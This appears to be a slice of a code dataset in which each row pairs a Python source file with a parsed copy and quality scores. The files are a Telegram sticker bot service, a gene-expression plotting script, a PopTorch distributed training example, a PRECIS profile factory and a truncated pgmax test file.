code stringlengths 2k 1.04M | repo_path stringlengths 5 517 | parsed_code stringlengths 0 1.04M | quality_prob float64 0.02 0.95 | learning_prob float64 0.02 0.93 |
|---|---|---|---|---|
import argparse
import logging
import typing
from dataclasses import dataclass
import telegram
import telegram.ext
import cotd.storage
@dataclass
class Options(argparse.Namespace):
    # CLI options parsed into a typed namespace (argparse fills these attrs).
    log_level: str
    version: str
    group: int
    mode: str
    db: int
@dataclass
class Flags(argparse.Namespace):
    # Feature toggles, also populated from the command line.
    feature_enable_security: bool
    feature_enable_persistence: bool
@dataclass
class EnvConfig:
    # Secrets sourced from the environment.
    token: str
@dataclass
class TGBotMetadata:
    # Identity of the bot account (populated from Bot.get_me() in factory()).
    user: telegram.User
@dataclass
class COTDBotStickers:
    # A sticker set together with the flat list of its sticker file ids.
    sticker_set: telegram.StickerSet
    sticker_set_file_ids: typing.List[str]
@dataclass
class HandlerGroup:
    # Handlers registered together under one dispatcher group index.
    group_index: int
    handlers: typing.List[telegram.ext.Handler]
@dataclass
class TGBotConfig:
    # Everything TGBotClient needs to assemble itself.
    updater: telegram.ext.Updater
    options: Options
    persistence: telegram.ext.DictPersistence
    metadata: TGBotMetadata
    handlers: typing.List[HandlerGroup]
    commands: typing.List[telegram.BotCommand]
@dataclass
class COTDBotConfig:
    # Configuration for the COTD service wrapper around the client.
    features: Flags
    logger: logging.Logger
class TGBotClient:
    """Telegram bot client: registers handlers and commands, then runs polling."""

    def __init__(self, config: TGBotConfig):
        # Flatten the config object into attributes for convenient access.
        for attr in ("options", "updater", "metadata", "commands",
                     "handlers", "persistence"):
            setattr(self, attr, getattr(config, attr))

    def set_dispatcher_handlers(self) -> None:
        """Register every handler with the dispatcher under its group index."""
        register = self.updater.dispatcher.add_handler
        for grp in self.handlers:
            for handler in grp.handlers:
                register(handler, group=grp.group_index)

    def set_commands(self) -> None:
        """Publish the bot's command list to Telegram."""
        self.updater.bot.set_my_commands(self.commands)

    def run(self) -> None:
        """Start long polling and block until the process is signalled."""
        self.updater.start_polling()
        self.updater.idle()

    def set_secure_sources(self) -> None:
        """Stash the trusted db/group chat ids on the dispatcher for handlers."""
        # NOTE(review): writes private attributes onto the dispatcher object.
        self.updater.dispatcher._cotd_db = self.options.db
        self.updater.dispatcher._cotd_group = self.options.group

    def initialize(self) -> None:
        """One-shot setup: secure sources, then handlers, then bot commands."""
        self.set_secure_sources()
        self.set_dispatcher_handlers()
        self.set_commands()
class COTDBotService:
    """Wraps a TGBotClient with COTD-specific behaviour (sticker management)."""

    def __init__(self, client: TGBotClient, config: COTDBotConfig):
        self.client = client
        self.logger = config.logger
        self.features = config.features

    def get_stickers(self) -> COTDBotStickers:
        """Fetch the bot-owned sticker set, creating it first if absent.

        Bug fix: the original passed ``fileids.extend(...)`` as
        ``sticker_set_file_ids`` — ``list.extend`` returns ``None``, so the
        field was always ``None``. The id list is now built directly.
        """
        if not (sticker_pack := self._fetch_sticker_set()):
            self._init_sticker_set()
            sticker_pack = self._fetch_sticker_set()
        return COTDBotStickers(
            sticker_set=sticker_pack,
            sticker_set_file_ids=[
                sticker.file_id for sticker in sticker_pack.stickers
            ],
        )

    def _init_sticker_set(self) -> bool:
        """Create the bot's sticker set from the bundled PNG. True on success."""
        # Close the file handle deterministically instead of leaking it.
        with open("static/smileyOne512x512.png", "rb") as png:
            return self.client.updater.bot.create_new_sticker_set(
                png_sticker=png,
                name=f"VC_by_{self.client.metadata.user.username}",
                title=f"VC_by_{self.client.metadata.user.username}",
                # TODO(review): hard-coded owner user id — move to config?
                user_id=145043750,
                emojis="🙂😊",
            )

    def _fetch_sticker_set(self) -> telegram.StickerSet:
        """Return the bot's sticker set; telegram.error.BadRequest propagates.

        The original try/except merely re-raised BadRequest, which is
        equivalent to not catching it at all.
        """
        return self.client.updater.bot.get_sticker_set(
            f"VC_by_{self.client.metadata.user.username}"
        )

    @property
    def stickers(self) -> COTDBotStickers:
        """Stickers are fetched lazily on every access (no caching)."""
        return self.get_stickers()
def factory(
    envs: EnvConfig,
    features: Flags,
    options: Options,
    client_logger: logging.Logger,
    cotd_logger: logging.Logger,
    commands: typing.List[telegram.BotCommand],
    handlers: typing.List[HandlerGroup],
    storage: cotd.storage.TelegramSavedMessagesStorage,
) -> COTDBotService:
    """Assemble the COTD bot service from its configuration pieces.

    Builds the ExtBot and Updater, wires loggers and persistence, fetches
    the bot's own identity, and wraps everything in a COTDBotService.
    """
    # With persistence disabled, substitute the in-memory dev storage.
    # (Annotations on local assignments are not evaluated at runtime.)
    storage: cotd.storage.TelegramSavedMessagesStorage | cotd.storage.TelegramSavedMessagesStorageDev = (
        storage
        if features.feature_enable_persistence
        else cotd.storage.TelegramSavedMessagesStorageDev(options.db)
    )
    bot = telegram.ext.ExtBot(
        token=envs.token,
        defaults=telegram.ext.Defaults(
            parse_mode="HTML",
            disable_notification=True,
            disable_web_page_preview=True,
            timeout=5.0,
        ),
    )
    updater = telegram.ext.Updater(
        bot=bot,
        use_context=True,
        persistence=storage,
        workers=1,
    )
    updater.logger = client_logger
    updater.dispatcher.logger = client_logger
    # get_me() performs a network call to learn the bot's own username/id.
    metadata = TGBotMetadata(updater.bot.get_me())
    tg_bot_client = TGBotClient(
        TGBotConfig(
            updater=updater,
            options=options,
            metadata=metadata,
            handlers=handlers,
            commands=commands,
            persistence=storage,
        )
    )
    return COTDBotService(
        tg_bot_client, config=COTDBotConfig(features=features, logger=cotd_logger)
) | cotd/service.py | import argparse
import logging
import typing
from dataclasses import dataclass
import telegram
import telegram.ext
import cotd.storage
@dataclass
class Options(argparse.Namespace):
log_level: str
version: str
group: int
mode: str
db: int
@dataclass
class Flags(argparse.Namespace):
feature_enable_security: bool
feature_enable_persistence: bool
@dataclass
class EnvConfig:
token: str
@dataclass
class TGBotMetadata:
user: telegram.User
@dataclass
class COTDBotStickers:
sticker_set: telegram.StickerSet
sticker_set_file_ids: typing.List[str]
@dataclass
class HandlerGroup:
group_index: int
handlers: typing.List[telegram.ext.Handler]
@dataclass
class TGBotConfig:
updater: telegram.ext.Updater
options: Options
persistence: telegram.ext.DictPersistence
metadata: TGBotMetadata
handlers: typing.List[HandlerGroup]
commands: typing.List[telegram.BotCommand]
@dataclass
class COTDBotConfig:
features: Flags
logger: logging.Logger
class TGBotClient:
def __init__(self, config: TGBotConfig):
self.options = config.options
self.updater = config.updater
self.metadata = config.metadata
self.commands = config.commands
self.handlers = config.handlers
self.persistence = config.persistence
def set_dispatcher_handlers(self) -> None:
for handler_group in self.handlers:
for handler in handler_group.handlers:
self.updater.dispatcher.add_handler(handler, group=handler_group.group_index)
def set_commands(self) -> None:
self.updater.bot.set_my_commands(self.commands)
def run(self) -> None:
self.updater.start_polling()
self.updater.idle()
def set_secure_sources(self) -> None:
self.updater.dispatcher._cotd_db = self.options.db
self.updater.dispatcher._cotd_group = self.options.group
def initialize(self) -> None:
self.set_secure_sources()
self.set_dispatcher_handlers()
self.set_commands()
class COTDBotService:
    """Wraps a TGBotClient with COTD-specific behaviour (sticker management)."""

    def __init__(self, client: TGBotClient, config: COTDBotConfig):
        self.client = client
        self.logger = config.logger
        self.features = config.features

    def get_stickers(self) -> COTDBotStickers:
        """Fetch the bot-owned sticker set, creating it first if absent.

        Bug fix: the original passed ``fileids.extend(...)`` as
        ``sticker_set_file_ids`` — ``list.extend`` returns ``None``, so the
        field was always ``None``. The id list is now built directly.
        """
        if not (sticker_pack := self._fetch_sticker_set()):
            self._init_sticker_set()
            sticker_pack = self._fetch_sticker_set()
        return COTDBotStickers(
            sticker_set=sticker_pack,
            sticker_set_file_ids=[
                sticker.file_id for sticker in sticker_pack.stickers
            ],
        )

    def _init_sticker_set(self) -> bool:
        """Create the bot's sticker set from the bundled PNG. True on success."""
        # Close the file handle deterministically instead of leaking it.
        with open("static/smileyOne512x512.png", "rb") as png:
            return self.client.updater.bot.create_new_sticker_set(
                png_sticker=png,
                name=f"VC_by_{self.client.metadata.user.username}",
                title=f"VC_by_{self.client.metadata.user.username}",
                # TODO(review): hard-coded owner user id — move to config?
                user_id=145043750,
                emojis="🙂😊",
            )

    def _fetch_sticker_set(self) -> telegram.StickerSet:
        """Return the bot's sticker set; telegram.error.BadRequest propagates.

        The original try/except merely re-raised BadRequest, which is
        equivalent to not catching it at all.
        """
        return self.client.updater.bot.get_sticker_set(
            f"VC_by_{self.client.metadata.user.username}"
        )

    @property
    def stickers(self) -> COTDBotStickers:
        """Stickers are fetched lazily on every access (no caching)."""
        return self.get_stickers()
def factory(
envs: EnvConfig,
features: Flags,
options: Options,
client_logger: logging.Logger,
cotd_logger: logging.Logger,
commands: typing.List[telegram.BotCommand],
handlers: typing.List[HandlerGroup],
storage: cotd.storage.TelegramSavedMessagesStorage,
) -> COTDBotService:
storage: cotd.storage.TelegramSavedMessagesStorage | cotd.storage.TelegramSavedMessagesStorageDev = (
storage
if features.feature_enable_persistence
else cotd.storage.TelegramSavedMessagesStorageDev(options.db)
)
bot = telegram.ext.ExtBot(
token=envs.token,
defaults=telegram.ext.Defaults(
parse_mode="HTML",
disable_notification=True,
disable_web_page_preview=True,
timeout=5.0,
),
)
updater = telegram.ext.Updater(
bot=bot,
use_context=True,
persistence=storage,
workers=1,
)
updater.logger = client_logger
updater.dispatcher.logger = client_logger
metadata = TGBotMetadata(updater.bot.get_me())
tg_bot_client = TGBotClient(
TGBotConfig(
updater=updater,
options=options,
metadata=metadata,
handlers=handlers,
commands=commands,
persistence=storage,
)
)
return COTDBotService(
tg_bot_client, config=COTDBotConfig(features=features, logger=cotd_logger)
) | 0.668556 | 0.144209 |
from pathlib import Path
from vectorseq.pipeline.stages import ExpressionPlots
from vectorseq.pipeline import ExpressionPlotsPipeline
from vectorseq.utils import create_dir
from vectorseq.marker_constants import VentralMidbrainGenes
# Analysis script (jupytext-style cells): expression plots for the inhibitory
# subset of experiment 3382, SNr brain region.
data_dir = Path("/spare_volume/vectorseq-data")
experiment_id = "3382"
brain_region = "snr"
run_dir = data_dir / experiment_id / brain_region
all_cells_output_dir = create_dir(run_dir / "all_cells")
inhibitory_output_dir = run_dir / "inhibitory"
figure_save_dir = create_dir(data_dir / "figures")
# NOTE(review): a bare string is passed here, so this subdir is presumably
# created relative to the CWD rather than under figure_save_dir — confirm.
figure_save_subdir = create_dir(f"{experiment_id}_{brain_region}_inhibitory_subset")
# Choose clustering scheme to use
n_neighbors = 45
leiden_resolution = 0.6
# %% [markdown]
# ## Expression Plots of Top 50 ranked genes for each inhibitory cluster
# %%
# Expression plots for the top-50 ranked genes per inhibitory cluster.
ranked_genes_expression = ExpressionPlots(
    source_path=inhibitory_output_dir / "cluster" / "adata.h5ad",
    output_dir=figure_save_dir,
    output_subdir=Path(figure_save_subdir) / "expression_plots_top50",
    n_neighbors=n_neighbors,
    leiden_resolution=leiden_resolution,
    rank_genes=True,
    n_genes=50,
)
results = ranked_genes_expression()
adata = results["adata"]
# %%
# Full expression-plot pipeline over the same clustered data.
gene_expression_pipe = ExpressionPlotsPipeline(
    source_data_path=inhibitory_output_dir / "cluster" / "adata.h5ad",
    output_dir=figure_save_dir / figure_save_subdir,
    n_neighbors=n_neighbors,
    leiden_resolution=leiden_resolution,
    brain_region=brain_region,
)
adata = gene_expression_pipe()
# %%
# Final figure restricted to the ventral-midbrain marker genes of interest.
final_figure = ExpressionPlots(
    source_path=inhibitory_output_dir / "cluster" / "adata.h5ad",
    output_dir=figure_save_dir,
    output_subdir=Path(figure_save_subdir) / "expression_plots",
    n_neighbors=n_neighbors,
    leiden_resolution=leiden_resolution,
    var_names={
        "Genes of Interest": list(
            VentralMidbrainGenes().VENTRAL_MIDBRAIN_MARKERS_WITH_TG_SUBSET
        )
    },
    save_name=f"neighbors_{n_neighbors}_leiden_{leiden_resolution}_final_figure",
    n_genes=50,
)
results = final_figure()
adata = results["adata"]
# %% | scripts/figures/3382_snr_expression_plots.py | from pathlib import Path
from vectorseq.pipeline.stages import ExpressionPlots
from vectorseq.pipeline import ExpressionPlotsPipeline
from vectorseq.utils import create_dir
from vectorseq.marker_constants import VentralMidbrainGenes
data_dir = Path("/spare_volume/vectorseq-data")
experiment_id = "3382"
brain_region = "snr"
run_dir = data_dir / experiment_id / brain_region
all_cells_output_dir = create_dir(run_dir / "all_cells")
inhibitory_output_dir = run_dir / "inhibitory"
figure_save_dir = create_dir(data_dir / "figures")
figure_save_subdir = create_dir(f"{experiment_id}_{brain_region}_inhibitory_subset")
# Choose clustering scheme to use
n_neighbors = 45
leiden_resolution = 0.6
# %% [markdown]
# ## Expression Plots of Top 50 ranked genes for each inhibitory cluster
# %%
ranked_genes_expression = ExpressionPlots(
source_path=inhibitory_output_dir / "cluster" / "adata.h5ad",
output_dir=figure_save_dir,
output_subdir=Path(figure_save_subdir) / "expression_plots_top50",
n_neighbors=n_neighbors,
leiden_resolution=leiden_resolution,
rank_genes=True,
n_genes=50,
)
results = ranked_genes_expression()
adata = results["adata"]
# %%
gene_expression_pipe = ExpressionPlotsPipeline(
source_data_path=inhibitory_output_dir / "cluster" / "adata.h5ad",
output_dir=figure_save_dir / figure_save_subdir,
n_neighbors=n_neighbors,
leiden_resolution=leiden_resolution,
brain_region=brain_region,
)
adata = gene_expression_pipe()
# %%
final_figure = ExpressionPlots(
source_path=inhibitory_output_dir / "cluster" / "adata.h5ad",
output_dir=figure_save_dir,
output_subdir=Path(figure_save_subdir) / "expression_plots",
n_neighbors=n_neighbors,
leiden_resolution=leiden_resolution,
var_names={
"Genes of Interest": list(
VentralMidbrainGenes().VENTRAL_MIDBRAIN_MARKERS_WITH_TG_SUBSET
)
},
save_name=f"neighbors_{n_neighbors}_leiden_{leiden_resolution}_final_figure",
n_genes=50,
)
results = final_figure()
adata = results["adata"]
# %% | 0.749912 | 0.26011 |
import argparse
import fcntl
import logging
import os
from contextlib import contextmanager
import torch
import torch.nn.functional as F
import torchvision
import poptorch
import popdist
import popdist.poptorch
import horovod.torch as hvd
class ModelWithLoss(torch.nn.Module):
    """ResNet-18 classifier that also computes an NLL loss when labels are given."""

    def __init__(self):
        super().__init__()
        self.model = torchvision.models.resnet18()
        self.loss = torch.nn.NLLLoss(reduction='mean')

    def forward(self, x, y=None):
        logits = self.model(x)
        # Inference path: no labels supplied, return raw logits only.
        if y is None:
            return logits
        # Training path: NLL over log-softmax, wrapped so PopTorch keeps
        # one loss value per replica (reduction='none').
        nll = self.loss(F.log_softmax(logits, dim=1), y)
        return logits, poptorch.identity_loss(nll, reduction='none')
def train(args):
    """Train ResNet-18 on CIFAR-10 across replicas, then validate on instance 0.

    Under PopRun (popdist) each process trains an identical replica and saves
    its own checkpoint; validation runs in a single process only.
    """
    if popdist.isPopdistEnvSet():
        instance = popdist.getInstanceIndex()
    else:
        instance = 0
    opts_train = create_options(args, train=True)
    data_train = load_data(args, opts_train, train=True)
    model = ModelWithLoss()
    # Training the model.
    model.train()
    optimizer = poptorch.optim.SGD(
        model.parameters(),
        lr=args.learning_rate,
        momentum=args.momentum,
        use_combined_accum=True,
    )
    poptorch_model = poptorch.trainingModel(
        model,
        opts_train,
        optimizer=optimizer,
    )
    log_in_single_instance("Training the model...")
    for epoch in range(args.epochs):
        log_in_single_instance(f"Epoch {epoch}")
        for x, y in data_train:
            _, loss = poptorch_model(x, y)
            # Loss contains a value for each replica.
            loss = torch.mean(loss)
            log_in_single_instance(f"Loss: {loss}")
    # Release IPU resources before building the inference model.
    poptorch_model.destroy()
    # Persist checkpoints from all instances even though they are identical,
    # this is useful for testing purposes.
    torch.save(model.state_dict(), f'checkpoint-instance-{instance}.pt')
    # Validation in a single process.
    if popdist.isPopdistEnvSet() and instance != 0:
        return
    opts_validation = create_options(args, train=False)
    data_validation = load_data(args, opts_validation, train=False)
    model.eval()
    poptorch_model = poptorch.inferenceModel(model, opts_validation)
    logging.info("Validating the model...")
    num_correct_predictions = 0
    for x, y in data_validation:
        y_pred = poptorch_model(x)
        # argmax over class logits.
        _, y_pred = torch.max(y_pred, 1)
        num_correct_predictions += torch.eq(y_pred, y).long().sum().item()
    accuracy = num_correct_predictions / len(data_validation.dataset)
    logging.info(f"Validation accuracy: {accuracy}")
def create_options(args, train):
    """Build poptorch Options: popdist-aware for training, plain for validation."""
    if not train:
        # We will validate the model in a single process so no need for
        # popdist-based options.
        return poptorch.Options()
    if popdist.isPopdistEnvSet():
        opts = popdist.poptorch.Options()
        # When using the dataloader with 'auto_distributed_partitioning=True'
        # and 'shuffle=True' we must set the random seed to ensure that tensors
        # are in the same order in all processes.
        opts.randomSeed(args.seed)
        # Replication factor is already set via PopRun so
        # we ignore 'args.num_replicas'.
        logging.info(f"Num of local replicas: {popdist.getNumLocalReplicas()}")
    else:
        opts = poptorch.Options()
        opts.replicationFactor(args.num_replicas)
    return opts
def load_data(args, opts, train):
    """Return a poptorch DataLoader over CIFAR-10, downloading under a dir lock."""
    # We need to lock the directory to avoid race conditions related to
    # downloading and writing a dataset.
    datasets_dir = os.path.expanduser('~/.torch/datasets')
    with create_and_lock_directory(datasets_dir):
        dataset = torchvision.datasets.CIFAR10(
            root=datasets_dir,
            train=train,
            download=True,
            transform=torchvision.transforms.Compose([
                torchvision.transforms.ToTensor(),
                torchvision.transforms.Normalize(
                    (0.5, 0.5, 0.5),
                    (0.5, 0.5, 0.5),
                ),
            ]),
        )
    # When using a dataloader with 'auto_distributed_partitioning=True',
    # PopTorch partitions the dataset for distributed execution (with PopRun)
    # automatically.
    return poptorch.DataLoader(
        opts,
        dataset,
        batch_size=args.batch_size,
        num_workers=args.dataloader_workers,
        shuffle=train,
        auto_distributed_partitioning=True,
    )
def log_in_single_instance(string):
    """Log *string* only once per job: from instance 0, or in non-popdist runs."""
    is_primary = (
        popdist.getInstanceIndex() == 0 if popdist.isPopdistEnvSet() else True
    )
    if is_primary:
        logging.info(string)
@contextmanager
def create_and_lock_directory(dir):
    """Context manager: ensure *dir* exists and hold an exclusive flock on it.

    Serializes dataset download/extraction across processes sharing a
    filesystem. Fixes of the original: ``os.makedirs(..., exist_ok=True)``
    replaces the try/except race idiom, and the lock is taken inside the
    try-block so the descriptor cannot leak if ``flock`` raises.
    (Parameter name ``dir`` shadows the builtin but is kept for
    backward compatibility.)
    """
    os.makedirs(dir, exist_ok=True)
    dir_fd = os.open(dir, os.O_RDONLY)
    try:
        fcntl.flock(dir_fd, fcntl.LOCK_EX)
        yield
    finally:
        # LOCK_UN on an unlocked fd is harmless; fd is always closed.
        fcntl.flock(dir_fd, fcntl.LOCK_UN)
        os.close(dir_fd)
if __name__ == '__main__':
    logging.basicConfig(level=logging.INFO)
    # add_help=False because PopRun may pass through its own --help handling.
    parser = argparse.ArgumentParser(add_help=False)
    parser.add_argument('--epochs', type=int, default=5)
    parser.add_argument('--batch-size', type=int, default=64)
    parser.add_argument('--learning-rate', type=float, default=0.001)
    parser.add_argument('--momentum', type=float, default=0.9)
    parser.add_argument('--num-replicas', type=int, default=4)
    parser.add_argument('--dataloader-workers', type=int, default=5)
    parser.add_argument('--seed', type=int, default=0)
    # Horovod is only initialized for multi-instance (popdist) runs.
    if popdist.isPopdistEnvSet():
        hvd.init()
train(parser.parse_args()) | feature_examples/pytorch/popdist/popdist_training.py | import argparse
import fcntl
import logging
import os
from contextlib import contextmanager
import torch
import torch.nn.functional as F
import torchvision
import poptorch
import popdist
import popdist.poptorch
import horovod.torch as hvd
class ModelWithLoss(torch.nn.Module):
def __init__(self):
super().__init__()
self.model = torchvision.models.resnet18()
self.loss = torch.nn.NLLLoss(reduction='mean')
def forward(self, x, y=None):
logits = self.model(x)
if y is None:
return logits
log_preds = F.log_softmax(logits, dim=1)
loss = self.loss(log_preds, y)
return logits, poptorch.identity_loss(loss, reduction='none')
def train(args):
if popdist.isPopdistEnvSet():
instance = popdist.getInstanceIndex()
else:
instance = 0
opts_train = create_options(args, train=True)
data_train = load_data(args, opts_train, train=True)
model = ModelWithLoss()
# Training the model.
model.train()
optimizer = poptorch.optim.SGD(
model.parameters(),
lr=args.learning_rate,
momentum=args.momentum,
use_combined_accum=True,
)
poptorch_model = poptorch.trainingModel(
model,
opts_train,
optimizer=optimizer,
)
log_in_single_instance("Training the model...")
for epoch in range(args.epochs):
log_in_single_instance(f"Epoch {epoch}")
for x, y in data_train:
_, loss = poptorch_model(x, y)
# Loss contains a value for each replica.
loss = torch.mean(loss)
log_in_single_instance(f"Loss: {loss}")
poptorch_model.destroy()
# Persist checkpoints from all instances even though they are identical,
# this is useful for testing purposes.
torch.save(model.state_dict(), f'checkpoint-instance-{instance}.pt')
# Validation in a single process.
if popdist.isPopdistEnvSet() and instance != 0:
return
opts_validation = create_options(args, train=False)
data_validation = load_data(args, opts_validation, train=False)
model.eval()
poptorch_model = poptorch.inferenceModel(model, opts_validation)
logging.info("Validating the model...")
num_correct_predictions = 0
for x, y in data_validation:
y_pred = poptorch_model(x)
_, y_pred = torch.max(y_pred, 1)
num_correct_predictions += torch.eq(y_pred, y).long().sum().item()
accuracy = num_correct_predictions / len(data_validation.dataset)
logging.info(f"Validation accuracy: {accuracy}")
def create_options(args, train):
if not train:
# We will validate the model in a single process so no need for
# popdist-based options.
return poptorch.Options()
if popdist.isPopdistEnvSet():
opts = popdist.poptorch.Options()
# When using the dataloader with 'auto_distributed_partitioning=True'
# and 'shuffle=True' we must set the random seed to ensure that tensors
# are in the same order in all processes.
opts.randomSeed(args.seed)
# Replication factor is already set via PopRun so
# we ignore 'args.num_replicas'.
logging.info(f"Num of local replicas: {popdist.getNumLocalReplicas()}")
else:
opts = poptorch.Options()
opts.replicationFactor(args.num_replicas)
return opts
def load_data(args, opts, train):
# We need to lock the directory to avoid race conditions related to
# downloading and writing a dataset.
datasets_dir = os.path.expanduser('~/.torch/datasets')
with create_and_lock_directory(datasets_dir):
dataset = torchvision.datasets.CIFAR10(
root=datasets_dir,
train=train,
download=True,
transform=torchvision.transforms.Compose([
torchvision.transforms.ToTensor(),
torchvision.transforms.Normalize(
(0.5, 0.5, 0.5),
(0.5, 0.5, 0.5),
),
]),
)
# When using a dataloader with 'auto_distributed_partitioning=True',
# PopTorch partitions the dataset for distributed execution (with PopRun)
# automatically.
return poptorch.DataLoader(
opts,
dataset,
batch_size=args.batch_size,
num_workers=args.dataloader_workers,
shuffle=train,
auto_distributed_partitioning=True,
)
def log_in_single_instance(string):
if not popdist.isPopdistEnvSet() or popdist.getInstanceIndex() == 0:
logging.info(string)
@contextmanager
def create_and_lock_directory(dir):
try:
os.makedirs(dir)
except FileExistsError:
pass
dir_fd = os.open(dir, os.O_RDONLY)
fcntl.flock(dir_fd, fcntl.LOCK_EX)
try:
yield
finally:
fcntl.flock(dir_fd, fcntl.LOCK_UN)
os.close(dir_fd)
if __name__ == '__main__':
logging.basicConfig(level=logging.INFO)
parser = argparse.ArgumentParser(add_help=False)
parser.add_argument('--epochs', type=int, default=5)
parser.add_argument('--batch-size', type=int, default=64)
parser.add_argument('--learning-rate', type=float, default=0.001)
parser.add_argument('--momentum', type=float, default=0.9)
parser.add_argument('--num-replicas', type=int, default=4)
parser.add_argument('--dataloader-workers', type=int, default=5)
parser.add_argument('--seed', type=int, default=0)
if popdist.isPopdistEnvSet():
hvd.init()
train(parser.parse_args()) | 0.789477 | 0.32168 |
import precis_i18n.baseclass as _base
import precis_i18n.profile as _profile
import precis_i18n.unicode as _unicode
def _factory(profile, **kwds):
    """Return a one-argument callable that builds *profile* with *kwds* preset."""
    def make(ucd):
        # The unicode data object is supplied last, at lookup time.
        return profile(ucd, **kwds)
    return make
# Registry of PRECIS profile constructors, keyed by normalized profile name:
# lower-cased with ':' replaced by '_' (see get_profile).
_PROFILES = {
    'identifierclass':
        _factory(_base.IdentifierClass, name='IdentifierClass'),
    'freeformclass':
        _factory(_base.FreeFormClass, name='FreeFormClass'),
    'usernamecasepreserved':
        _factory(_profile.Username, name='UsernameCasePreserved'),
    'usernamecasemapped':
        _factory(_profile.Username, name='UsernameCaseMapped', casemap='lower'),
    'usernamecasemapped_casefold':
        _factory(_profile.Username,
                 name='UsernameCaseMapped:CaseFold',
                 casemap='fold'),
    'usernamecasemapped_tolower':
        _factory(_profile.Username,
                 name='UsernameCaseMapped:ToLower',
                 casemap='lower'),
    'opaquestring':
        _factory(_profile.OpaqueString, name='OpaqueString'),
    'nicknamecasepreserved':
        _factory(_profile.Nickname, name='NicknameCasePreserved'),
    'nicknamecasemapped':
        _factory(_profile.Nickname, name='NicknameCaseMapped', casemap='lower'),
    'nicknamecasemapped_casefold':
        _factory(_profile.Nickname,
                 name='NicknameCaseMapped:CaseFold',
                 casemap='fold'),
    'nicknamecasemapped_tolower':
        _factory(_profile.Nickname,
                 name='NicknameCaseMapped:ToLower',
                 casemap='lower'),
    # Alias for backward-compatibility with previous version of codec.
    'nickname':
        _factory(_profile.Nickname, name='Nickname', casemap='lower')
}
def get_profile(name, *, unicodedata=None):
    """Return the desired PRECIS profile object.
    Choose name from:
    "IdentifierClass"
    "FreeFormClass"
    "UsernameCasePreserved"
    "UsernameCaseMapped"
    "UsernameCaseMapped:CaseFold"
    "UsernameCaseMapped:ToLower"
    "OpaqueString"
    "NicknameCasePreserved"
    "NicknameCaseMapped"
    "NicknameCaseMapped:CaseFold"
    "NicknameCaseMapped:ToLower"
    "Nickname" (alias for "NicknameCaseMapped")
    This function constructs a new profile each time; there is no cache.
    To use an alternative Unicode implementation, pass a module or object that
    implements the unicodedata interface via the unicodedata keyword argument.
    The default is to use the unicodedata module built into the Python runtime.
    Args:
    name (str): name of a PRECIS profile
    unicodedata (module|object): Alternative unicodedata interface
    Returns:
    AbstractProfile: PRECIS profile object.
    Raises:
    KeyError: Profile not found.
    """
    # Normalize the lookup key the same way _PROFILES keys are spelled:
    # lower-case, with ':' replaced by '_'.
    profile = name.lower().replace(':', '_')
return _PROFILES[profile](_unicode.UnicodeData(unicodedata)) | precis_i18n/factory.py |
import precis_i18n.baseclass as _base
import precis_i18n.profile as _profile
import precis_i18n.unicode as _unicode
def _factory(profile, **kwds):
def _construct(ucd):
return profile(ucd, **kwds)
return _construct
_PROFILES = {
'identifierclass':
_factory(_base.IdentifierClass, name='IdentifierClass'),
'freeformclass':
_factory(_base.FreeFormClass, name='FreeFormClass'),
'usernamecasepreserved':
_factory(_profile.Username, name='UsernameCasePreserved'),
'usernamecasemapped':
_factory(_profile.Username, name='UsernameCaseMapped', casemap='lower'),
'usernamecasemapped_casefold':
_factory(_profile.Username,
name='UsernameCaseMapped:CaseFold',
casemap='fold'),
'usernamecasemapped_tolower':
_factory(_profile.Username,
name='UsernameCaseMapped:ToLower',
casemap='lower'),
'opaquestring':
_factory(_profile.OpaqueString, name='OpaqueString'),
'nicknamecasepreserved':
_factory(_profile.Nickname, name='NicknameCasePreserved'),
'nicknamecasemapped':
_factory(_profile.Nickname, name='NicknameCaseMapped', casemap='lower'),
'nicknamecasemapped_casefold':
_factory(_profile.Nickname,
name='NicknameCaseMapped:CaseFold',
casemap='fold'),
'nicknamecasemapped_tolower':
_factory(_profile.Nickname,
name='NicknameCaseMapped:ToLower',
casemap='lower'),
# Alias for backward-compatibility with previous version of codec.
'nickname':
_factory(_profile.Nickname, name='Nickname', casemap='lower')
}
def get_profile(name, *, unicodedata=None):
"""Return the desired PRECIS profile object.
Choose name from:
"IdentifierClass"
"FreeFormClass"
"UsernameCasePreserved"
"UsernameCaseMapped"
"UsernameCaseMapped:CaseFold"
"UsernameCaseMapped:ToLower"
"OpaqueString"
"NicknameCasePreserved"
"NicknameCaseMapped"
"NicknameCaseMapped:CaseFold"
"NicknameCaseMapped:ToLower"
"Nickname" (alias for "NicknameCaseMapped")
This function constructs a new profile each time; there is no cache.
To use an alternative Unicode implementation, pass a module or object that
implements the unicodedata interface via the unicodedata keyword argument.
The default is to use the unicodedata module built into the Python runtime.
Args:
name (str): name of a PRECIS profile
unicodedata (module|object): Alternative unicodedata interface
Returns:
AbstractProfile: PRECIS profile object.
Raises:
KeyError: Profile not found.
"""
profile = name.lower().replace(':', '_')
return _PROFILES[profile](_unicode.UnicodeData(unicodedata)) | 0.715821 | 0.076167 |
import re
import jax.numpy as jnp
import numpy as np
import pytest
from pgmax import fgroup, vgroup
def test_single_factor():
    """Error paths for empty/overfull factor groups, plus group comparison."""
    with pytest.raises(ValueError, match="Cannot create a FactorGroup with no Factor."):
        fgroup.ORFactorGroup(variables_for_factors=[])
    A = vgroup.NDVarArray(num_states=2, shape=(10,))
    B = vgroup.NDVarArray(num_states=2, shape=(10,))
    variables0 = (A[0], B[0])
    variables1 = (A[1], B[1])
    ORFactor0 = fgroup.ORFactorGroup(variables_for_factors=[variables0])
    with pytest.raises(
        ValueError, match="SingleFactorGroup should only contain one factor. Got 2"
    ):
        fgroup.SingleFactorGroup(
            variables_for_factors=[variables0, variables1],
            factor=ORFactor0,
        )
    ORFactor1 = fgroup.ORFactorGroup(variables_for_factors=[variables1])
    # NOTE(review): result is discarded — presumably this just exercises the
    # FactorGroup comparison dunder without asserting; confirm intent.
    ORFactor0 < ORFactor1
def test_enumeration_factor_group():
    """Validation, lookup, and flatten/unflatten behaviour of EnumFactorGroup."""
    vg = vgroup.NDVarArray(shape=(2, 2), num_states=3)
    # Mis-shaped log potentials are rejected.
    with pytest.raises(
        ValueError,
        match=re.escape("Expected log potentials shape: (1,) or (2, 1). Got (3, 2)"),
    ):
        enumeration_factor_group = fgroup.EnumFactorGroup(
            variables_for_factors=[
                [vg[0, 0], vg[0, 1], vg[1, 1]],
                [vg[0, 1], vg[1, 0], vg[1, 1]],
            ],
            factor_configs=np.zeros((1, 3), dtype=int),
            log_potentials=np.zeros((3, 2)),
        )
    # Integer log potentials are rejected.
    with pytest.raises(ValueError, match=re.escape("Potentials should be floats")):
